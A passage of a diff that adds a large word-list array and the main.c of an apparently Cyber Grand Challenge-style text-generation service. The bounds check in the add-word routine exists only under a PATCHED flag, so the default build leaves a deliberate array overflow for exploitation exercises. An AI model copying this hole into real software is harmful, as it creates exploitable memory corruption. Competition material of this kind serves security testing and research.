"loner", + "glum", + "await", + "glycerin", + "Highness", + "civil servant", + "dachshund", + "Australian", + "flattery", + "fornication", + "gas pedal", + "clinical", + "manhood", + "civilize", + "import", + "centennial", + "influenza", + "hash", + "comfortably", + "cockeyed", + "hateful", + "intermittently", + "glimpse", + "cogently", + "basket case", + "charge account", + "civil war", + "magnanimous", + "covert", + "dentures", + "lumber", + "lampshade", + "innovate", + "backtrack", + "liberty", + "circumvention", + "escalate", + "disorganization", + "constraint", + "logical", + "anachronistic", + "lure", + "cob", + "involvement", + "decathlon", + "enviously", + "desktop", + "buzzword", + "innocent", + "gamut", + "cleaners", + "espouse", + "intensify", + "dig", + "gleefully", + "abnormality", + "breakneck", + "elusive", + "hesitancy", + "double bass", + "instep", + "hunchback", + "cinder", + "hair", + "capital punishment", + "grandpa", + "considerately", + "discard", + "barrio", + "congenital", + "consonant", + "cornet", + "joyfully", + "color", + "archaeological", + "homogenized", + "acquaint", + "banner", + "credit rating", + "calculus", + "ecologist", + "conqueror", + "haphazard", + "along", + "enemy", + "freeway", + "calmness", + "lives", + "chemist", + "emptiness", + "hushed", + "inspired", + "historically", + "living", + "hometown", + "litany", + "godfather", + "footlights", + "coincidence", + "infuriating", + "apricot", + "hymnal", + "inept", + "entitled", + "disentangle", + "intersect", + "mantle", + "introduce", + "handicapped", + "ford", + "crane", + "dour", + "intricate", + "leafy", + "markdown", + "healer", + "jackass", + "fellowship", + "feasibility", + "allusion", + "carving", + "amphibian", + "bogeyman", + "foundry", + "hickey", + "betrayal", + "forbidding", + "cashew", + "glorious", + "elimination", + "lengthen", + "good guy", + "appeasement", + "blood type", + "concerto", + "comparison", + "gentleman", + "law", + "deliberation", + "liberal", + "latrine", + "feedbag", + "dishtowel", + "iguana", + "conclusive", + "full moon", + "crematoria", + "faltering", + "flowered", + "blameless", + "deed", + "amnesiac", + "godsend", + "bury", + "eastbound", + "foolproof", + "Canadian", + "glamorous", + "country and western", + "curvy", + "loophole", + "cubicle", + "anxiously", + "excision", + "inpatient", + "hemp", + "awkward", + "cornflakes", + "condom", + "around", + "bamboo", + "charmer", + "gadget", + "defendant", + "hasty", + "editor", + "broad", + "explicable", + "evenhanded", + "children", + "breath", + "bomb disposal", + "gambit", + "exchange rate", + "imperative", + "academic", + "chronically", + "mainland", + "jaws", + "astrologer", + "guiltily", + "cue", + "liquidate", + "disparaging", + "ideal", + "bicker", + "m", + "harmonize", + "jaunt", + "asthmatic", + "determination", + "equal", + "breast", + "extreme", + "luncheon", + "agreeable", + "cafeteria", + "good-looking", + "fiendish", + "irregular", + "bashing", + "crossword puzzle", + "entertain", + "determined", + "bitter", + "chunk", + "clutter", + "crib", + "alignment", + "k", + "jock", + "collar", + "bowlegged", + "environs", + "furtive", + "caged", + "inhuman", + "bare-bones", + "impasse", + "dispassionately", + "autoworker", + "across", + "luster", + "formidable", + "black market", + "deputy", + "abreast", + "clutch", + "double", + "inevitably", + "insert", + "interior", + "green bean", + "fixed", + "grant", + "distill", + "iffy", + "absorbing", + "frivolous", + "barracks", + "hemisphere", + "insensitively", + "hyphenate", + "innocuous", + "comment", + "bye", + "devour", + "cookbook", + "fuss", + "information", + "commission", + "air-conditioned", + "daytime", + "bangs", + "angler", + "interception", + "ask", + "collide", + "acclimate", + "locksmith", + "lever", + "godless", + "explanation", + "gent", + "eager", + "bit", + "curry", + "fashionably", + "drone", + "chowder", + "guidelines", + "Federal Reserve System", + "homogeneity", + "condor", + "cradle", + "dreadful", + "grief", + "doohickey", + "dampness", + "investigation", + "chat", + "drawbridge", + "glass", + "expulsion", + "AstroTurf", + "faithful", + "glorify", + "insured", + "beach", + "caricature", + "entangle", + "intrepid", + "lighting", + "discolor", + "complexity", + "deadlock", + "killer", + "embezzler", + "falsity", + "arbitrate", + "left-hand", + "illogical", + "disrupt", + "counterbalance", + "column", + "argument", + "introverted", + "bout", + "collate", + "federation", + "deliberately", + "jerky", + "electric razor", + "drank", + "bland", + "contort", + "colored", + "abruptness", + "Christ", + "carbon copy", + "companion", + "cutthroat", + "backwards", + "bitch", + "blueberry", + "enlargement", + "bagpipes", + "itch", + "asparagus", + "imitative", + "legislate", + "artifact", + "indefinable", + "ebony", + "judicious", + "autonomy", + "isolation", + "conveniently", + "ditty", + "aback", + "falsification", + "khaki", + "carp", + "gravitation", + "giveaway", + "awkwardness", + "long-distance", + "garage sale", + "beer", + "intern", + "junk food", + "chilling", + "inducement", + "liquidation", + "Catholic", + "implore", + "martial law", + "double-decker", + "feeling", + "disfavor", + "ensure", + "depreciation", + "jelly", + "alma mater", + "humanities", + "infraction", + "glowworm", + "liberal arts", + "because of", + "escapism", + "imaginary", + "earthy", + "copulation", + "crepe paper", + "conspicuous", + "hairdresser", + "Girl Scouts", + "bleach", + "D.C.", + "coagulate", + "blastoff", + "kidnapper", + "antagonistically", + "leverage", + "forum", + "elapse", + "bumblebee", + "comedy", + "epitaph", + "increase", + "harpsichord", + "dude ranch", + "cockroach", + "fixation", + "hyphen", + "campground", + "homicide", + "burger", + "elm", + "excursion", + "Hispanic", + "chitchat", + "blow-dry", + "bigotry", + "bumpy", + "blotch", + "confuse", + "differ", + "letup", + "cartoonist", + "contentment", + "concealment", + "bail", + "diverse", + "coordinator", + "absolutely", + "census", + "ale", + "lead", + "accused", + "harelip", + "hardwood", + "hippo", + "double-cross", + "castigation", + "improbable", + "gnome", + "intimidation", + "kindle", + "maddeningly", + "existence", + "amok", + "blab", + "baleful", + "administration", + "emergency brake", + "distance", + "abject", + "hi", + "keepsake", + "lb.", + "eagle-eyed", + "britches", + "house-sitter", + "freezer", + "enrage", + "epitomize", + "in-flight", + "lurk", + "ceremonial", + "ballot", + "abduct", + "component", + "malnourished", + "bible", + "drapes", + "leathery", + "arduous", + "indemnify", + "housekeeper", + "infielder", + "accomplish", + "homey", + "guardian", + "bearing", + "German", + "downwards", + "acid", + "catfish", + "lightly", + "immovable", + "Atlantic", + "insolent", + "gearshift", + "acerbic", + "coffee", + "displacement", + "bribe", + "freehand", + "cardinal", + "cesarean", + "attendant", + "long-standing", + "load", + "disclaimer", + "accuracy", + "alluring", + "altitude", + "crowded", + "deck", + "chauvinism", + "book", + "bridal", + "combustion", + "gas station", + "ashes", + "heaviness", + "health club", + "forage", + "course", + "elaborately", + "ash", + "leak", + "accented", + "hovel", + "fluctuation", + "gesture", + "farming", + "disappointed", + "foe", + "flow chart", + "charitable", + "ma", + "bobcat", + "harm", + "invoice", + "genetic", + "acre", + "dinner", + "fraternize", + "expiration date", + "intensity", + "knack", + "emigrant", + "commercialize", + "intermarry", + "broadcast", + "byte", + "jumpsuit", + "lemon", + "impeccably", + "deeply", + "ingrained", + "discovery", + "abridge", + "endlessly", + "darkroom", + "lustrous", + "l", + "artificial respiration", + "extract", + "curiosity", + "arrogantly", + "gnarly", + "labor union", + "forborne", + "clinician", + "longingly", + "easterly", + "altar", + "kin", + "diphthong", + "energy", + "flu", + "hermit", + "cesspool", + "difference", + "exhausted", + "machete", + "castoff", + "guidance counselor", + "freewheeling", + "flown", + "ground crew", + "filly", + "follicle", + "fantasize", + "delve", + "July", + "development", + "a", + "availability", + "cappuccino", + "canny", + "lukewarm", + "jolly", + "document", + "embargo", + "ante", + "husk", + "COLA", + "acorn", + "manage", + "encroach", + "beholder", + "adolescent", + "admissible", + "hilltop", + "insufficient", + "decision", + "gullet", + "lopsided", + "acrobatics", + "check-in", + "continental", + "disengage", + "defective", + "catch", + "exchange", + "helter-skelter", + "concern", + "fries", + "election", + "gas chamber", + "litmus test", + "hope", + "delegation", + "horseback riding", + "aqueduct", + "demolition", + "barefoot", + "crack", + "henchman", + "anchorwoman", + "Feb.", + "gulf", + "goat", + "divisive", + "diary", + "blotchy", + "lesbianism", + "episode", + "kilometer", + "employ", + "blouse", + "example", + "divulge", + "flyswatter", + "enforce", + "ice-cold", + "acronym", + "forgetful", + "block", + "burnt", + "HQ", + "glow", + "coffee shop", + "Anglican", + "county", + "league", + "local time", + "caterpillar", + "cantankerous", + "astonishingly", + "against", + "honeysuckle", + "martyrdom", + "cheerful", + "elfin", + "hairsplitting", + "dry-clean", + "irrelevant", + "couch potato", + "general", + "gift", + "coaster", + "disinterest", + "croquet", + "cerebral", + "Britain", + "garden", + "fast", + "interjection", + "continued", + "congestion", + "critique", + "archaic", + "inquiry", + "abstain", + "bombed", + "dimple", + "hood", + "extensive", + "disk jockey", + "aggressively", + "demotion", + "great-grandson", + "john", + "earring", + "hazelnut", + "flamboyant", + "lib", + "enlistment", + "marital status", + "biweekly", + "interchangeably", + "fixture", + "aspiring", + "fogy", + "autocracy", + "bra", + "garbage", + "impending", + "marketability", + "indistinguishable", + "cadence", + "January", + "greenery", + "hunk", + "enliven", + "buoyancy", + "implementation", + "joyously", + "bottom line", + "difficult", + "lifesaver", + "enumerate", + "ft.", + "hot chocolate", + "left wing", + "bide", + "hillbilly", + "accompaniment", + "blue blood", + "hoarse", + "goose bumps", + "evaporate", + "loaves", + "helplessly", + "drug addict", + "clergyman", + "dissertation", + "comeback", + "genera", + "grouchy", + "bristle", + "calculating", + "intercede", + "cuticle", + "generically", + "disaffected", + "invitation", + "excellently", + "devastating", + "conspiracy", + "acknowledgment", + "bearable", + "bathrobe", + "arthritic", + "drier", + "apple cider", + "forearm", + "dis", + "entail", + "hewn", + "fire hydrant", + "haystack", + "bag", + "Lutheran", + "centenary", + "grace", + "daydreamer", + "getup", + "cameo", + "cheek", + "havoc", + "inter", + "carbohydrate", + "announcement", + "latch", + "glassy", + "Jesus", + "Internet", + "immunization", + "doctrine", + "aspirin", + "fulfilled", + "loathsome", + "electric shock", + "dump", + "infiltrate", + "harmonica", + "lamb", + "barn", + "earnest", + "locate", + "genitalia", + "enterprise", + "fickle", + "leaves", + "go", + "amazed", + "caravan", + "ID", + "discount store", + "defecate", + "junction", + "federalism", + "maniac", + "chopsticks", + "booking", + "intonation", + "basis", + "definite article", + "inattentive", + "filter", + "confess", + "captivity", + "childbirth", + "bawl", + "forbore", + "checked", + "grumble", + "maliciously", + "expressively", + "hyperactivity", + "magnificently", + "hidden", + "interloper", + "full house", + "fed", + "good old boy", + "dissect", + "forcible", + "mall", + "cooking", + "daybreak", + "grandson", + "anesthetic", + "illegitimacy", + "documentation", + "abuse", + "hammock", + "exhaustive", + "eyelid", + "handbag", + "directions", + "flabbergasted", + "exhibition", + "bunk bed", + "fissure", + "indistinct", + "forcefully", + "deference", + "jaunty", + "ineptitude", + "anthropologist", + "inhabitant", + "death row", + "forth", + "alternation", + "glacier", + "coals", + "disqualify", + "cuisine", + "approbation", + "marshy", + "facility", + "flock", + "apron", + "counterpart", + "bootlegger", + "building", + "canned", + "kangaroo", + "epigram", + "accompanist", + "husky", + "inward", + "bald", + "highbrow", + "bandit", + "convex", + "bases", + "colonial", + "gingerbread", + "bray", + "fighter", + "cod", + "black", + "last name", + "entomology", + "honor", + "god-awful", + "cheers", + "cuteness", + "a la mode", + "gall", + "foreword", + "boat people", + "apprentice", + "herald", + "arcade", + "lovers", + "house arrest", + "boutique", + "eradicate", + "disease", + "err", + "deplore", + "compute", + "dial", + "life span", + "horseshoes", + "enforceable", + "cockpit", + "immaturity", + "admirable", + "afterthought", + "irrepressible", + "delete", + "club soda", + "grad", + "abstinent", + "keep", + "aviator", + "listen", + "disenfranchise", + "dissent", + "flashlight", + "coincidental", + "hands-off", + "alumnae", + "disagree", + "desirable", + "inadequacy", + "intercom", + "hymn", + "concoct", + "inheritance", + "consolidate", + "countryside", + "art", + "caucus", + "amphitheater", + "frighteningly", + "catapult", + "headache", + "downstream", + "downtime", + "gentile", + "heathen", + "lastly", + "cooperate", + "bloodhound", + "majestically", + "imp", + "appointment", + "lug", + "decimal", + "coexistence", + "dated", + "inn", + "cactus", + "jangle", + "daub", + "extinguish", + "harem", + "contaminate", + "congregate", + "historian", + "elements", + "chick", + "customer", + "discreet", + "individualistic", + "exterminate", + "chord", + "installation", + "air", + "conflict of interest", + "fiction", + "hornet", + "laboriously", + "debrief", + "foam", + "lovingly", + "discipline", + "absurdly", + "Coca-Cola", + "comforting", + "hotbed", + "idiotically", + "convenient", + "conciliation", + "hundredth", + "cancel", + "audiovisual", + "escaped", + "capitulation", + "guesstimate", + "dejection", + "droppings", + "basin", + "flotilla", + "acclimation", + "congress", + "formative", + "colonialism", + "formulation", + "callously", + "form", + "list", + "bluish", + "checkmate", + "embalm", + "envious", + "lyrical", + "allure", + "dusty", + "coordination", + "ambivalence", + "eczema", + "auction", + "mannish", + "bacteria", + "disoriented", + "abortive", + "bargaining chip", + "dirt", + "brush-off", + "margin of error", + "disproportionate", + "apathy", + "aboveboard", + "knocker", + "B.S.", + "climax", + "discussion", + "apologize", + "equivalence", + "illness", + "archaeology", + "hijacking", + "condensation", + "lollipop", + "grandeur", + "lookalike", + "glacial", + "intellect", + "later", + "Atlantic Ocean", + "excuse", + "low", + "horrific", + "doorway", + "homosexual", + "hot flash", + "jacket", + "disparate", + "common-law wife", + "incendiary", + "bugle", + "hairdo", + "haywire", + "liqueur", + "bazaar", + "hypnotize", + "calculate", + "adoration", + "dorsal", + "advantage", + "enormous", + "beveled", + "fleshy", + "bisection", + "convent", + "greeting", + "detonate", + "mailbox", + "eloquently", + "eventual", + "blissful", + "duchess", + "aria", + "group", + "huddle", + "impudence", + "baseball", + "eunuch", + "esthetically", + "good-bye", + "illiteracy", + "inessential", + "lexicon", + "hospitalize", + "jump", + "busily", + "managerial", + "gargle", + "knead", + "chloroform", + "magic", + "finale", + "fragrance", + "feline", + "childish", + "brawn", + "ceaselessly", + "banal", + "lite", + "cul-de-sac", + "greenhorn", + "bring", + "dislocation", + "high-grade", + "galley", + "ballad", + "connotation", + "eternal", + "inquest", + "AWOL", + "heart attack", + "appointed", + "malaise", + "gradually", + "burner", + "blackbird", + "cholesterol", + "advancement", + "institution", + "induce", + "e", + "douse", + "glib", + "inaction", + "copper", + "enduring", + "hothead", + "drum", + "farmyard", + "hay fever", + "engage", + "head count", + "mane", + "lick", + "further", + "deface", + "imagery", + "hot-tempered", + "inauguration", + "cannibalism", + "ambition", + "district", + "manger", + "decorate", + "ethical", + "eavesdropper", + "badger", + "freethinker", + "certifiable", + "collapsible", + "animated", + "electrocution", + "embarrassingly", + "Greek", + "jellyfish", + "equestrian", + "discourse", + "instantaneous", + "depravity", + "bait", + "inexplicable", + "boiling point", + "diagonal", + "glitzy", + "hard-working", + "adrenaline", + "befallen", + "herbivore", + "cold", + "inception", + "major-league", + "crutch", + "indices", + "conduct", + "industrialization", + "doz.", + "carousel", + "expect", + "cutting", + "capitalist", + "bandage", + "hopefully", + "investment", + "geology", + "coop", + "befell", + "forked", + "grease", + "annexation", + "kindergarten", + "boomerang", + "belatedly", + "hypertension", + "encompass", + "caught", + "goddamned", + "conference", + "heading", + "ecstasy", + "listener", + "dairy", + "degradation", + "experienced", + "barometric", + "glass ceiling", + "evenness", + "current", + "jinx", + "celebrated", + "immigrate", + "cut", + "autograph", + "diversion", + "kayak", + "feces", + "icon", + "eel", + "maim", + "bowl", + "fearlessly", + "assumption", + "awful", + "habitable", + "bearded", + "double-talk", + "insoluble", + "celery", + "criticize", + "enlighten", + "autobiographical", + "due process", + "cold-blooded", + "boyhood", + "extort", + "expropriate", + "humorist", + "benign", + "fender-bender", + "extol", + "chamber", + "euphemism", + "investor", + "cultivated", + "infest", + "fl. oz.", + "desolation", + "illustrate", + "life-threatening", + "audit", + "bloodshot", + "cynical", + "activist", + "Fri.", + "cheaply", + "gritty", + "deformity", + "Confederate", + "bimonthly", + "bundle", + "fire engine", + "aerosol", + "chauvinist", + "encyclopedia", + "devil", + "crisis", + "fondly", + "infrared", + "elongated", + "insubordinate", + "doghouse", + "hideously", + "blacken", + "child", + "appreciatively", + "imperfection", + "cross", + "butte", + "contemptible", + "imprisonment", + "from", + "fear", + "hamburger", + "DC", + "deprived", + "gosling", + "companionable", + "immobility", + "lust", + "clapper", + "eh", + "induct", + "limit", + "blabbermouth", + "boulder", + "categorize", + "expensive", + "CIA", + "ballistics", + "chairman", + "buoyantly", + "distracted", + "debut", + "epileptic", + "disuse", + "commotion", + "abusive", + "dispensable", + "lozenge", + "campaign", + "drizzle", + "footbridge", + "confident", + "clothesline", + "lettuce", + "empathize", + "kidney bean", + "cesarean section", + "conjure", + "elitist", + "drape", + "eligible", + "hag", + "bidding", + "funky", + "evangelist", + "hazel", + "birdseed", + "crackle", + "glad", + "lounge", + "experience", + "counterfeiter", + "dopey", + "attache case", + "impediment", + "halo", + "hacksaw", + "extremist", + "foul ball", + "flaccid", + "ammonia", + "hexagon", + "documentary", + "guarantor", + "interpersonal", + "gore", + "defiance", + "balloon", + "herd", + "fatalism", + "dash", + "exporter", + "light-headed", + "dust", + "alkaline", + "base", + "cautiously", + "conscience", + "ferociously", + "hackneyed", + "itemize", + "bran", + "consider", + "candle", + "chimpanzee", + "fruity", + "frustrating", + "flow", + "aggravation", + "hydraulics", + "abstinence", + "folk music", + "gossip", + "great", + "dandy", + "feminist", + "flophouse", + "dubious", + "disapproving", + "fire department", + "gotta", + "did", + "legal-size", + "cassette", + "crowbar", + "don't", + "heard", + "access", + "giddy", + "decent", + "amateur", + "chuckle", + "keg", + "condiment", + "low-key", + "figuratively", + "blubber", + "homeopathy", + "candidly", + "chintz", + "aural", + "given", + "male chauvinist", + "homeward", + "executive", + "locker", + "bookmaker", + "force-feed", + "beater", + "bottleneck", + "exhume", + "hang gliding", + "auditorium", + "framework", + "lynch", + "childlike", + NULL +}; diff --git a/exclude/FUN/src/main.c b/exclude/FUN/src/main.c new file mode 100644 index 000000000..383ee72a3 --- /dev/null +++ b/exclude/FUN/src/main.c @@ -0,0 +1,936 @@ +/* + * Copyright (c) 2015 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include "cgc_stdlib.h" +#include "cgc_ctype.h" +#include "cgc_stddef.h" +#include "cgc_stdint.h" + +#include "cgc_text.h" +#include "cgc_words_r.h" + +#define INTPTR_MAX INT32_MAX +#define UINTPTR_MAX UINT32_MAX + +#define CALL(x, ...) ((funptr_t)((uintptr_t)funcs[(x)] - secret_key))(__VA_ARGS__) +#define STATIC_SECRET_KEY 0x12345678 +uintptr_t secret_key; +typedef uintptr_t (*funptr_t) (uintptr_t, ...); +funptr_t funcs[]; +enum { + PROTECT, + CALLOC, + FREE, + STRDUP, + STRCPY, + MEMCPY, + STRNCMP, + STRCMP, + BYTECMP, + TO_LOWER, + SEARCH_WORDS, + SORT_WORDS, + ADD_WORD, + VERIFY_WORD, + ANALYZE_TEXT, + GENERATE_TEXT, + RANDOM_DICT_WORD, + RANDOM_WORD, + RANDINT, + INIT, + STRNCPY, + STRLEN, + IS_ALPHA, + PRINTF, + READ, + READ_ALL, + READ_UINT, + READ_STRING, + WRITE_UINT, + WRITE_ERROR, + WRITE_STRING, + HASH_STRING, + HTBL_INIT, + HTBL_ENLARGE, + HTBL_GET, + HTBL_SET, + HTBL_FREE, + HTBL_FIRST, + HTBL_NEXT, + FUNCS_END +}; + +enum { + CMD_QUIT = 0, + CMD_REPROTECT = 0x35897932, + CMD_ADD_WORD = 0x38462643, + CMD_SORT_WORDS = 0x38327950, + CMD_GENERATE_TEXT = 0x2884, + CMD_TRAINING = 0x1971, + CMD_SEARCH_WORD = 0x69399375, + CMD_SEARCH_PARTIAL = CMD_SEARCH_WORD + 1 + // = 0x10582097 + // = 0x49445923 +}; + +enum { + ERROR_OK = 0, + ERROR_INVAL = 1, + ERROR_NOMEM = 2, + ERROR_NOTFOUND = 3 +}; + +typedef struct htbl_node { + struct htbl_node *next; + struct htbl_node *prev; + char *key; + uintptr_t value; +} htbl_node_t; + +typedef struct { + cgc_size_t i; + htbl_node_t *cur; +} htbl_iter_t; + +typedef struct { + unsigned int count; + unsigned int size; + htbl_node_t **nodes; +} htbl_t; + +static void cgc_my_to_lower(char *s) +{ + cgc_size_t i; + for (i = 0; s[i] != 0; i++) + s[i] |= 0x20; +} + +static void cgc_my_strcpy(char *dst, const char *src) +{ + cgc_size_t length = CALL(STRLEN, src); + CALL(MEMCPY, dst, src, length + 1); +} + +static void cgc_my_memcpy(char *dst, char *src, cgc_size_t length) +{ + cgc_size_t i; + for (i = 0; i != length; i++) + dst[i] = src[i]; +} + +static uintptr_t cgc_my_hash_string(const char *s, uintptr_t tbl_size) +{ + cgc_size_t i; + uintptr_t result = 0xDEADBEEF; + for (i = 0; s[i] != 0; i++) + result = (result * 13) ^ s[i]; + + return result % tbl_size; +} + +static intptr_t cgc_my_htbl_init(htbl_t *tbl, uintptr_t initial_size) +{ + tbl->count = 0; + tbl->size = initial_size; + tbl->nodes = CALL(CALLOC, tbl->size, sizeof(htbl_node_t *)); + + if (tbl->nodes == NULL) + return 0; + + return 1; +} + +static void cgc_my_htbl_enlarge(htbl_t *tbl) +{ + cgc_size_t i, new_size = (tbl->size + 1) * 2; + htbl_node_t **new_tbl; + + new_tbl = CALL(CALLOC, new_size, sizeof(htbl_node_t *)); + if (new_tbl == NULL) + return; + + for (i = 0; i < tbl->size; i++) + { + htbl_node_t *node, *next_node; + for (node = tbl->nodes[i]; node != NULL; node = next_node) + { + uintptr_t hash = CALL(HASH_STRING, node->key, new_size); + next_node = node->next; + + node->next = new_tbl[hash]; + node->prev = NULL; + if (node->next) + node->next->prev = node; + new_tbl[hash] = node; + } + } + + CALL(FREE, tbl->nodes); + tbl->nodes = new_tbl; + tbl->size = new_size; +} + +static void cgc_my_htbl_first(htbl_t *tbl, htbl_iter_t *iter) +{ + cgc_size_t i; + for (i = 0; i < tbl->size; i++) + if (tbl->nodes[i] != NULL) + break; + + iter->i = i; + iter->cur = tbl->nodes[i]; +} + +static void cgc_my_htbl_next(htbl_t *tbl, htbl_iter_t *iter) +{ + if (iter->cur == NULL) + return; + + if (iter->cur->next != NULL) + { + iter->cur = iter->cur->next; + } + else + { + cgc_size_t i; + for (i = iter->i + 1; i < tbl->size; i++) + if (tbl->nodes[i] != NULL) + break; + iter->i = i; + + if (iter->i == tbl->size) + iter->cur = NULL; + else + iter->cur = tbl->nodes[i]; + } +} + +static inline htbl_node_t *find_node(htbl_t *tbl, const char *key) +{ + uintptr_t hash = CALL(HASH_STRING, key, tbl->size); + htbl_node_t *node; + + for (node = tbl->nodes[hash]; node != NULL; node = node->next) + if (CALL(STRCMP, key, node->key) == 0) + break; + + return node; +} + +static uintptr_t cgc_my_htbl_get(htbl_t *tbl, const char * key) +{ + htbl_node_t *node = find_node(tbl, key); + + if (node == NULL) + return NULL; + else + return node->value; +} + +static uintptr_t cgc_my_htbl_set(htbl_t *tbl, const char *key, uintptr_t value) +{ + htbl_node_t *node = find_node(tbl, key); + if (node == NULL) + { + uintptr_t hash; + if (tbl->count * 2 >= tbl->size) + CALL(HTBL_ENLARGE, tbl); + + if (tbl->nodes == NULL) + return NULL; + + node = cgc_malloc(sizeof(htbl_node_t)); + if (node == NULL) + return NULL; + + node->key = CALL(STRDUP, key); + if (node->key == NULL) + { + cgc_free(node); + return NULL; + } + node->value = value; + + hash = CALL(HASH_STRING, key, tbl->size); + node->next = tbl->nodes[hash]; + node->prev = NULL; + if (node->next) + node->next->prev = node; + tbl->nodes[hash] = node; + tbl->count++; + return NULL; + } + else + { + uintptr_t retval = node->value; + node->value = value; + return retval; + } +} + +static void cgc_my_htbl_free(htbl_t *tbl, uintptr_t free_value) +{ + cgc_size_t i; + + for (i = 0; i < tbl->size; i++) + { + htbl_node_t *node, *next_node; + for (node = tbl->nodes[i]; node != NULL; node = next_node) + { + next_node = node->next; + CALL(free_value, node->value); + CALL(FREE, node); + } + } + + CALL(FREE, tbl->nodes); + tbl->nodes = NULL; + tbl->size = 0; + tbl->count = 0; +} + +static char *cgc_my_strdup(const char *s) +{ + cgc_size_t length = CALL(STRLEN, s); + char *str = CALL(CALLOC, length + 1, 1); + if (str == NULL) + return NULL; + CALL(STRCPY, str, s); + return str; +} + +static intptr_t cgc_my_strlen(const char *s) +{ + cgc_size_t i; + for (i = 0; s[i] != 0; i++) ; + return i; +} + +static void cgc_my_strncpy(char * dest, const char * src, intptr_t len) +{ + cgc_size_t i; + for (i = 0; i < len; i++) + { + dest[i] = src[i]; + if (src[i] == 0) + break; + } +} + +static intptr_t cgc_my_strncmp(char * a, char * b, intptr_t len) +{ + cgc_size_t i; + for (i = 0; i < len && a[i] != 0 && b[i] != 0; i++) + { + int result = CALL(BYTECMP, a[i], b[i]); + if (result != 0) + return result; + } + + if (i == len) + return 0; + + return CALL(BYTECMP, a[i], b[i]); +} + +static intptr_t cgc_my_strcmp(char * a, char * b) +{ + cgc_size_t i; + for (i = 0; a[i] != 0 && b[i] != 0; i++) + { + int result = CALL(BYTECMP, a[i], b[i]); + if (result != 0) + return result; + } + + return CALL(BYTECMP, a[i], b[i]); +} + +static intptr_t cgc_my_bytecmp(intptr_t a, intptr_t b) +{ + return a - b; +} + +static intptr_t cgc_my_search_words(const char *needle, int partial) +{ + int len = CALL(STRLEN, needle); + cgc_size_t i; + uintptr_t f = partial ? STRNCMP : STRCMP; + for (i = 0; words[i] != NULL; i++) + if (CALL(f, needle, words[i], len) == 0) + return i; + + return -1; +} + +static void cgc_my_sort_words(uintptr_t comparator, intptr_t reverse) +{ + int done; + cgc_size_t i; + + do { + done = 1; + for (i = 1; words[i] != NULL; i++) + { + int result = CALL(comparator, words[i-1], words[i]); + if ((!reverse && result > 0) || (reverse && result < 0)) + { + const char *tmp = words[i]; + words[i] = words[i-1]; + words[i-1] = tmp; + done = 0; + } + } + } while (!done); +} + +static intptr_t cgc_my_verify_word(const char *word) +{ + int len = CALL(STRLEN, word), i; + + // check that it contains a non-trivial root word + for (i = 0; i < len - 3; i++) + { + char root[4]; + CALL(STRNCPY, root, word, 3); + root[3] = 0; + + if ((intptr_t)CALL(SEARCH_WORDS, root, 1) >= 0) + break; + } + if (i == len - 3) + return 0; + + // check that word doesn't already exist + if ((intptr_t)CALL(SEARCH_WORDS, word, 0) >= 0) + return 0; + + return 1; +} + +static intptr_t cgc_my_add_word(const char *word) +{ + cgc_size_t i; + if (CALL(VERIFY_WORD, word) == 0) + return 0; + + for (i = 0; words[i] != NULL; i++) ; + +#ifdef PATCHED + if (i >= sizeof(words) / sizeof(words[0])) + return 0; +#endif + + words[i] = CALL(STRDUP, word); + words[i+1] = NULL; + return 1; +} + +static const char *cgc_my_random_dict_word() +{ + cgc_size_t i, r; + for (i = 0; words[i] != NULL; i++) ; + r = CALL(RANDINT, 0, i); + return words[r]; +} + +uint32_t cgc_tornado(); +static uintptr_t cgc_my_randint(uintptr_t min, uintptr_t max) +{ + cgc_size_t bytes; + uintptr_t rand, range = max - min; + + int fd; +try_again: +#if 0 + if (cgc_random(&rand, sizeof(rand), &bytes) != 0 || bytes != sizeof(rand)) + return min; +#endif + rand = cgc_tornado(); + + uintptr_t q = UINTPTR_MAX - (UINTPTR_MAX % range); + if (rand >= q) + goto try_again; + + return min + (rand % range); +} + +static const char *cgc_my_random_word(htbl_t *tbl, uintptr_t cur_length) +{ + cgc_size_t count = 0; + uintptr_t rand; + htbl_iter_t iter; + + for (CALL(HTBL_FIRST, tbl, &iter); iter.cur != NULL; CALL(HTBL_NEXT, tbl, &iter)) + count += iter.cur->value; + + if (count == 0) + return NULL; + + rand = CALL(RANDINT, 0, count); + for (CALL(HTBL_FIRST, tbl, &iter); iter.cur != NULL; CALL(HTBL_NEXT, tbl, &iter)) + { + if (rand < iter.cur->value) + break; + rand -= iter.cur->value; + } + + // end the sentence if possible and cur_length is large + if (CALL(HTBL_GET, tbl, "") != 0) + { + rand = CALL(RANDINT, 0, 10); + if (cur_length >= 30) + { + if (rand >= 3) + return ""; + } + else if (cur_length >= 20) + { + if (rand >= 5) + return ""; + } + else + { + if (rand >= 9) + return ""; + } + } + + return iter.cur->key; +} + +static char *cgc_my_generate_text(htbl_t *tbl, int training) +{ + const char *prev = "", *word, *outword; + char tmp[128]; + cgc_size_t i = 0; + uintptr_t len; + + do { + word = CALL(RANDOM_WORD, CALL(HTBL_GET, tbl, prev), i); + if (word == NULL) + return NULL; + + if (!training || CALL(RANDINT, 0, 10) != 0) + outword = word; + else + outword = CALL(RANDOM_DICT_WORD, 0); + + len = CALL(STRLEN, outword); + if (i + len + 5 >= sizeof(tmp)) + break; + + if (i == 0) + { + CALL(MEMCPY, &tmp[i], outword, len); + tmp[i] &= ~0x20; // make upper case + } + else + { + if (CALL(STRCMP, outword, "s") == 0) + tmp[i++] = '\''; + else if (CALL(STRCMP, outword, "") != 0) + tmp[i++] = ' '; + CALL(MEMCPY, &tmp[i], outword, len); + } + + prev = word; + i += len; + } while (CALL(STRCMP, prev, "") != 0); + + if (i + len + 5 >= sizeof(tmp)) + { + tmp[i++] = '.'; + tmp[i++] = 